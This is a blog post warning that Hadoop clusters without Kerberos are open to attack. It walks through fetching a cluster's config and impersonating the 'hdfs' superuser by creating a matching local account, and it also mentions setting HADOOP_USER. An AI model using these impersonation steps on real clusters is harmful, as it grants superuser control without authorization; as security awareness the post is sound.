Hadoop and no auth?
3 mins readSeptember 14, 2020
hadoop
hack
hdfs
yarn
security
authentication
Have you setup a hadoop cluster and enabled no authentication for it (kerberos)? You definitely need to read this.
Recently I was working with an engineer who was setting up a HBase cluster and restore some data into it. He uploaded the data to HDFS, setup the hbase data directory configuration and booted the HBase. But the HBase started complaining as follows.
Caused by: org.apache.hadoop.ipc.RemoteException(org.apache.hadoop.security.AccessControlException): Permission denied: user=userB, access=WRITE, inode="/foo/bar/hbase":userA:groupZ:drwxr-xr-x
So HMaster is not able to read the files in /foo/bar/hbase
directory as userB
, because the files are owned by userA
.
As we were working remotely, I was supposed to ask him the credentials of a Hadoop node from where I could the change the owner of these files. But I didn’t. I knew that the HDFS cluster is insecure and I had hadoop binaries on my machine. I just pointed my hadoop tools to his HDFS cluster. Here is how
- Download the configurations from his cluster
$ whoami mmp $ mkdir /tmp/newconf $ cd /tmp/newconf $ wget http://hdfs.node.com:50070/conf #namenode http url
- Make more copies (hadoop tools, by default load them)
$ cp conf hdfs-site.xml $ cp conf yarn-site.xml $ cp conf core-site.xml $ cp conf mapred-site.xml $ chmod -R 777 /tmp/newconf # let others use them ;)
- Point the tools to this new directory
$ export HADOOP_CONF_DIR=/tmp/newconf
- Run the tools
$ hdfs dfs -chown -R userB:groupY /foo/bar/hbase chown: changing ownership of '/foo/bar/hbase': Permission denied. user=mmp is not the owner of inode=hbase
- Since the I had logged in as
mmp
, tools I was running were enacting asmmp
. So I createduserA
in my local machine$ useradd userA $ sudo su - userA [userA@localhost]$ export HADOOP_CONF_DIR=/tmp/newconf [userA@localhost]$ hdfs dfs -chown -R userB:groupY /foo/bar/hbase chown: changing ownership of '/foo/bar/hbase': Non-super user cannot change owner
- Now,
userA
was not defined as a superuser in HDFS configuration, so I can’t run thischown
asuserA
. Buthdfs
user definitely can$ useradd hdfs $ sudo su - hdfs [hdfs@localhost]$ export HADOOP_CONF_DIR=/tmp/newconf [hdfs@localhost]$ hdfs dfs -chown -R userB:groupY /foo/bar/hbase [hdfs@localhost]$ hdfs dfs -ls /foo/bar/hbase Found 4 items drwxr-xr-x - userB groupY 0 2020-09-09 22:05 /foo/bar/hbase ...
Conclusion
- If you have a insecure cluster, it’s open for attacks. Attackers can login as any user by
- Logging in as the required user in their machine and connecting to your cluster.
- Setting the
HADOOP_USER
environment variable to whatever value they want to (hdfs
,yarn
which are superusers)
- I have even seen the Hadoop clusters on Cloud attacked to mine bitcoins, so securing the clusters with authentication mechanisms such as
kerberos
can help securing your resources (memory and cpu)